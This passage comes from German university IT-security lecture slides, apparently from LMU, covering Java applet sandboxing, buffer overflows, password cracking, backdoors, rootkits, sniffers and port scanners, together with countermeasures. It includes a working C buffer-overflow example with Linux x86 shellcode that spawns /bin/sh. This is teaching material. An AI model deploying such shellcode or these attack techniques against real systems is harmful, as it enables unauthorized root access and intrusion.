T Hidden frame mit eingebetteter PostMethode + Attachment sendet Files an böswilligen Web- Server
T JavaScript eingebettet in Cookie;
damit z.B. Lesen der Bookmarks oder HTML Dateien im Cache www.peacefire.org/security /jscookies/
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
Mobile Code: Java (Applets) Mobile Code: Java (Applets)
Q
Entwickelt von SUN Microsystems
Q
Applet
T
Byte-Code (vorkompiliert)
T
Benötigt JVM (Java Virtual Machine) zur Ausführung
QMögliche Bedrohungen
T
Denial of Service
T
Implementierungsfehler in der JVM
(z.B. Netscape 2.0 erlaubte Applet den Verbindungsaufbau zu beliebiger URL); Liste der Bugs: www.cs.princeton.edu/sip/history/
Q
Design der Sprache unterstützt Sicherheit und Robustheit
T
Keine Pointer
T
Kein direkter Speicherzugriff; Test ob Array-Grenzen eingehalten werden
T
Strenge Typisierung
Q
Explizite Sicherheitsarchitektur; im folgenden kurzer Einschub
dazu
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 39
Einschub
Einschub - - Java Sicherheitsarchitektur: Komponenten Java Sicherheitsarchitektur: Komponenten
Q
Bytecode-Verifier: Es soll nur „korrekter“
Java Code ausgeführt werden!
T Korrektes Format des class Files
T Syntaktische Korrektheit
T Einfache Datenflußanalyse (Simulation und Analyse des Programmablaufs); Kein Überlauf des Operandenstack
Q
Classloader: Laden und Instantiieren der Objekte
T Schutz der Systemklassen vor Überschreiben
T Sichtbarkeit (Alle Objekte die von einem Classloader geladen wurden bilden eigenen Namensraum)
T Lade- und Bindestrategie: „lazy loading and early bound“
Laden erst bei Verwendung des Objektes; bei weiterem Nachladeversuch wird bereits geladenes Objekt verwendet
Apple Apple tt
Bytecode
Bytecode--VerifierVerifier
Classloader Classloader
Security Security Manager/
Manager/
Access
Access ControlerControler JVM JVM
Verifikationsphase Verifikationsphase
Ladephase Ladephase
Ausf
Ausfüührungsphasehrungsphase
3.3 Einschub: Java Sicherheitsarchitektur 3.3 Einschub: Java Sicherheitsarchitektur
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 40
Sandbox
Sandbox
Betriebssystem
Betriebssystem
JVMJVM
Java Sicherheitsarchitektur: Sandbox Java Sicherheitsarchitektur: Sandbox
Q
Realisiert durch Security Manager
Q
Java 1.0.2 Sicherheitsmodell
Q
Beschränkung des Zugriffs auf Ressourcen des BS:
T Dateisystem (Read, Write, Delete)
T Netzwerkzugriffe
(Zugriffe zu dem Rechner von dem das Applet geladen wurde, sind erlaubt)
T Zugriff auf die JVM
(z.B. Instantiieren von Classloader)
T Verwaltung von Threads
T Elemente der GUI
(z.B. Clippboard, „fremde“ Fenster)
T Zugriff auf Systemressourcen zum Starten von Prozessen
T Eingeschränkter Zugriff auf Systemvariablen (Properties) der JVM
Q
Diese Ressourcen für Applets verboten
Applet
Applet Application
Application3.3 Einschub: Java Sicherheitsarchitektur 3.3 Einschub: Java Sicherheitsarchitektur
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 41
„Evolution „ Evolution“ “ der Sandbox der Sandbox
Q
Java 1.1
T
Trusted (d.h. signierte) Applets können Sandbox verlassen
Betriebssystem
Betriebssystem
JVMJVM
Sandbox
Sandbox
BetriebssystemBetriebssystem
JVMJVM
Sandbox
Sandbox
Q
Java 1.2
T
Mechanismen der Sandbox zur Beschränkung der Rechte können auch feingranular auf Appli- cations angewandt werden
Signed
Signed
AppletApplet
3.3 Einschub: Java Sicherheitsarchitektur 3.3 Einschub: Java Sicherheitsarchitektur
Java 1.2 Sicherheitsarchitektur Java 1.2 Sicherheitsarchitektur
Q
Security Manager realisiert Sandbox; d.h. zentrale Instanz für Zugriffskontrolle
T Relativ starres Konzept
T Applets können Sandbox nicht verlassen, daher nutzt Sec.Mgr.
Q
Access Controller
T parametrisierbar
Q
Zugriffskontrollentscheidung wird vom Access Controller getroffen;
Grundlage der Entscheidung basiert auf:
T Code Source
URLs und Menge von Signaturen, d.h. öffentlichen Schlüsseln, kenn- zeichnen Java Objekte (Entitäten)
T Permission
kapselt Objekte mit bestimmten Operationen; über CodeSource einer Entität zugeordnet, stellt sie ein Recht dar
T Protection Domain
Gruppierungsobjekt, um alle Rechte einer CodeSource zusammenzufassen
T Policy Objekt
kapselt alle Permissions aller Entitäten
Java Programmcode
Java Programmcode
Java APIJava API Native
Native
LibrariesLibraries
Security Manager
Security Manager
Access Controller
Access Controller
BetriebssystemBetriebssystem
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 43
Java Security Manager / Access Controller Java Security Manager / Access Controller
Q
Security Manager (vor Java 1.2)
T Wird vor der Ausführung einer kritischen Operation mittels check-Methode aufgerufen Bsp.: Jeder lesende Dateizugriff ruft über checkReadden Sec.Mgr.
T Falls Aufruf durch trusted Code, kehrt Sec.Mgr. zurück, andernfalls Security Exception
Q
Ab Version 1.2:
T Sec.Mgr. ruft mit einem entspr.
Permission Objekt den Access Controller über die Methode checkPermissionauf
T Damit Abwärtskompatibilität
T Anwendbar auch für Applications
T Erweiterbar um eigene Permission- Objekte
Q
Spezifikation einer Policy (Bsp.)
grant CodeBase„http://java.sun.com“, SignedBy „gong“ {
permission
java.io.FilePermission,
„read,write“, „/tmp/*“;
}
T Alle Objekt von java.sun.com, die von gongsigniert sind, bilden eine Protection Domain.
T Allen Objekten aus dieser Domain wird die Permission erteilt, innerhalb von /tmp zu schreiben
3.3 Einschub: Java Sicherheitsarchitektur 3.3 Einschub: Java Sicherheitsarchitektur
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 44
Inhalt (2) Inhalt (2)
3. Bedrohungen, Angriffe und Gefährdungen (Forts.)
6.
Buffer Overflow
7.
Account / Password Cracking
8.
Hintertüren / Falltüren
9.
Rootkits
10.
Sniffer
11.
Port Scanner
4. „Twenty Most Vulnerabilities“
5. Zusammenfassung
3
3 SecuritySecurity--EngineeringEngineering
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 45
Exploits
Exploits: Buffer Overflow : Buffer Overflow
Q
Ziel: Ausführen von Code auf fremdem Rechner unter fremden Rechten (z.B. root)
Q
Vorgehen:
T Auswahl eines Programmes, das z.B. mit SUID (Set User ID)-Bit, d.h. mit Rechten des Eigentümers, läuft
T Überschreiben interner Programmpuffer, z.B. durch überlange Eingabe
T Dabei Manipulation z.B. der Rücksprungadresse, dadurch
T Ausführen von bestimmter
Programmsequenz des Angreifers;
z.B. Assembler- bzw. Maschinen- Code zum Starten einer Shell (shellcode)
Q
Speicherabbild eines Programmes (am Bsp. Unix)
Text (Programm Code)
Initialized data bss
Heap User Stack argc
argv (Parameter)
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
Beispiel
Beispiel- -Code Buffer Overflow Code Buffer Overflow
/* shellcode für Linux auf Intel Architektur */
char
shellcode[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x 46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\
x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96]; /* char 1 Byte */
int i;
/*Zeiger auf large_string; long 4 Byte */
long *long_ptr = (long *) large_string;
/* large_string wird mit der Adresse von buffer belegt */
for(i=0; i<32; i++)
*(long_ptr + i)=(int) buffer;
/*shellcode in large_string kopieren */
for (i=0; i<strlen(shellcode); i++) large_string[i] = shellcode[i];
/*Kopie von large_string in buffer; shellcode und pointer; buffer overflow */
strcpy(buffer,large_string); }
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 47
Buffer Overflow ( Buffer Overflow (Bsp Bsp ) )
Q
Speicher vor dem Aufruf von
strcpy()Q
Nach Aufruf von strcpy() ist die Rücksprungadresse überschrie- ben; shellcode wird ausgeführt
bss heap
shellcode[]large_string[128]
buffer[96]
i long_ptr
sfp (Stack frame pointer) ret (Rücksprungadresse)
User stack argc
bss heap
shellcode[]large_string[128]
buffer[96]
i long_ptr
sfp ret User stack
argc
strcpy strcpy overflow overflow
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 48
Buffer Overflow Durchf
Buffer Overflow Durchfü ührung hrung
Q
Im Bsp. shellcode fest ins Programm ein-compiliert
Q
Bei realem Buffer Overflow muss shellcode ins Laufzeitsystem
“eingebracht” werden
Q
Dazu gezielte Manipulation von
T
Kommandozeilen-Argumenten
T
Shell-Umgebungsvariablen
T
Interaktiver Input
T
Nachrichten des Netzverkehrs
Q
Problem dabei ist das “Erraten” der Adresse des shellcode im Speicher
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 49
Buffer Overflow Schutz Buffer Overflow Schutz
Q
Zentraler Ansatz; Modifikation von
T SUID Programmen
T Compiler:
OWarnung vor “gefährlichen”
Funktionen
OVermeidung dieser Fkt., d.h.
nicht standardkonforme Änderung
OEinbindung von Fkt. welche die Integrität des Stack vor der Rückgabe des Return-Wertes testen
T Betriebssystem:
OStack Segmente werden als nicht ausführbar markiert Q
Dezentraler Ansatz; Modifikation
von
T Einzelnen SUID Programmen
Q
“Sichere” Programmierung:
T Verzicht auf Funktionen die Pointer auf ein Ergebnis im Speicher zurückliefern
T Verzicht auf Funktionen zur String- Manipulation ohne Längenprüfung, z.B. fgets() statt gets() verwenden
T Strenge Überprüfung der Eingabeparameter bezgl. Anzahl, Länge und Datentyp
T Strenge Überprüfung verwendeter Umgebungsvariablen
Q
Weitere Info:
[Smith 97]
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
Exploits
Exploits: : Account Account/ /Password Password Cracking Cracking
Q
Häufig Benutzername + Passwort zur Authentisierung
Q
“Erraten” von Benutzernamen und Passwort
Q
Brute-Force Angriff / Dictionary Attack bei bekanntem Benutzer- namen (alle möglichen “Passworte” durch-probieren)
Q
Brechen des Verschlüsselungsalgorithmus für das Passwort
Q
Social Engineering
Q
Password Cracking am Beispiel von UNIX:
T
Administrator (root) vergibt Benutzernamen
T
Eintrag in /etc/passwd
O
Datei für alle lesbar
O
Format des Eintrags
reiser:Ad9%y?SmW+zP&:23:17:HelmutReiser:/home/reiser:/bin/tcsh Username:Password:UID:GID:Gecko-String:Home-Verzeichnis:Shell
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 51
Bsp. UNIX Authentisierung: User /
Bsp. UNIX Authentisierung: User / Password Password
Q
Benutzer wählt Passwort
T Passwort wird, mit sich selbst als Schlüssel, verschlüsselt und verschlüsselt gespeichert in /etc/passwd:
z.B. :Ad9%y?SmW+zP&:
T Auch rootkennt Passwort nicht Q
Authentisierung:
T Eingegebenes Passwort wird mit sich selbst verschlüsselt u. mit dem in /etc/passwd verglichen Q
Verschlüsselungsalgorithmus
crypt(pwd,salt)bekannt
Q
Dictionary Attack:
T Angreifer verschlüsselt Wörterbuch und vergleicht verschlüsselte Strings mit Einträgen in /etc/passwd
Q
Verhinderung der Dictionary Attack
T Zus. Parameter salt in crypt
O 12 Bit Zahl: 0 <= salt< 4096
O Bei Initialisierung zufällig gewählt
O Die ersten 2 Zeichen im Passwort String sind salt;
im angegeb. Bsp. Ad Q
Brute Force Dictionary Attack:
T Angreifer muss Wörterbuch für jeden Benutzer mit dessen salt verschlüsseln und vergleichen
T Bei heutiger Rechenleistung kein echtes Problem
Q
Verhinderung z.B. durch:
T Shadow Password System (nur root kann verschl. Passwort lesen)
T One-Time Passwords
T ….
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 52
Einschub: US
Einschub: US- -CERT Alert CERT Alert TA05 TA05- -136A 136A
Q
Apple MAC OS X is affected by multiple vulnerabilities
Q
Systems affected: MAC OS X version 10.3.9 (Panther) and OS X Server version 10.3.9
Q
Description / Impact:
T Terminal fails to properly santinize x-man-page URI / executing code
T libXpm image library vulnerable to buffer overflow / executing code, DOS
T libTIFF vulnerable to integer overflow / execute code
T libXpm vulnerable to multiple integer overflows / execute code
T chpass/chfn/chsh utilities do not properly validate external programms / execute code
T Foundation framework buffer overflow / execute code
T vpnd buffer overflow /execute code
T Blutooth may allow files to be exchanged with other systems by default without prompting user
T Netinfo setup tool fails to validate command line parameters /execute code Q
Solution:
T Install a patch
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 53
Exploits
Exploits: Back : Back Doors Doors, , Trap Trap Doors Doors
Q
Ziel: Angreifer will Zugang (Hintereingang) zu einer bereits kompromittierten Maschine
T An der Betriebssystem- Authentisierung vorbei
T Mit speziellen Rechten (z.B. root) Q
Mechanismen, (z.B.):
T Trojaner mit versteckter Funktionalität
T Installation eines “versteckten”
Netzdienstes, der zu bestimmten Zeiten einen Netzwerk-Port öffnet und auf Kommandos wartet
T Eintrag in .rhostsDatei von root
T Mail-Alias, dass bei Empfang einer Mail bestimmtes Programm startet
T SUID/SGID Shell-Skript
Q
Schutzmechanismen:
Q
Integritäts-Checks:
T Kryptographische Prüfsummen:
O aller installierten Programme
O Konfigurationsdateien
O Sowie deren regelmäßige Überprüfung
T Überprüfung der offenen Ports und der aktivierten Netzdienste
T Suche nach ungewöhnlichen SUID/SGID Programmen
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
Exploits
Exploits: : Rootkits Rootkits
Q
Werkzeugsammlung mit dem Ziel:
T Verbergen dass Rechner kompromittiert wurde
T Zugang zum Rechner erhalten Q
Bsp. für Rootkit-Werkzeuge
T Trojaner
T Back Door Programme
T Camouflage-Tools:
OTool zur Manipulation des System-Logs
OManipulierte
Systemkommandos um bestimmte Dateien,
Verzeichnisse, Prozesse und Netzverbindungen zu
“verstecken”
T Remote Control Tools
Q
Linux Rootkit IV als Beispiel
T Trojaner und Backdoors:
chfn, chsh, inetd, login,passwd, rsh:
Passwort geschützte root-Shell
T bindshell, Server als Backdoor
T Camouflage:
O Manipulierte Programme verbergen Rootkit-Information du, find, ifconfig, killall, ls, netstat, pidof, ps, syslogd, tcpd, top
O Tools zur Manipulation der Logfileslastlog, utmp, wtmp
T Packetsniffer
T Eigene Crontab
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 55
Beispiel: Back
Beispiel: Back Orifice Orifice
Q
Remote Administration “Tool” für Windows
Q
Server muss auf der anzugreifenden Maschine installiert werden; ermöglicht vollen Zugriff auf alle Ressourcen
Q
Kann, wie ein Virus, an ausführbare Dateien “angehängt”
werden
Q
Plug-In Architektur z.B. Plug-Ins zur Verschlüsselung der Kommunikation; Übertragung des Bildschirminhalts, Steuerung der Maus, Übertragung von Videos,...
Q
Aktivierung entfernter Hardware, z.B. Kamera, Sound,....
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 56
Sniffer
Sniffer: Abh : Abhö ö ren des Netzverkehrs ren des Netzverkehrs
Q
Local Area Network (LAN):
T I.d.R. gemeinsam genutztes Medium (shared medium), z.B.
Ethernet, Token Ring
T Netzwerk-Karten können im Prinzip gesamten Verkehr mithören, aber
T geben nur die an den Rechner adressierten Packete weiter Q
Gefahr: “Promiscious Mode”:
T Einstellung der Karte
T Im Promiscious Mode werden alle Pakete gelesen
T Gefahr wird durch „geswitchtes“
Netz relativiert
Q
Wide Area Network (WAN):
T Jeder Vermittlungsrechner kann Nachrichten „mitlesen“
Q
Tools:
T Übergang zwischen Werkzeug des System- sowie Netzadministrators und Cracker Tool sind fließend
T tcpdump
Standard-Werkzeug diverser Unix Varianten
T eathereal
Packet-Analyzer (Unix, Windows)
T snoop Sun Solaris
T ...
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
© Helmut Reiser, Institut für Informatik, LMU ITIT--SicherheitSicherheit 57
Port Scanner Port Scanner
Q
Suchen auf entferntem Rechner nach „offenen“ Ports
T
Versuch eines Verbindungsaufbau / pro Port
T
Falls erfolgreich = Port „offen“
Q
Damit Identifikation von Diensten
Q
Gezielte Suche nach Rechner die Dienste mit bekannten Schwächen anbieten
Q
Auch hier ist der Übergang zwischen nützlichem Werkzeug und Cracker Tool fließend
Q
WARNUNG: Port Scan auf fremde Netze/Maschinen werden als Angriff gewertet
Q
Beispiele:
T nmap
(Unix)
T
Knocker
3.3 Bedrohungen, Angriffe, Gef 3.3 Bedrohungen, Angriffe, Gefäährdungenhrdungen
Inhalt (2) Inhalt (2)
3. Bedrohungen, Angriffe und Gefährdungen (Forts.)
6.
Buffer Overflow
7.
Account / Password Cracking
8.
Hintertüren / Falltüren
9.
Rootkits
10.
Sniffer
11.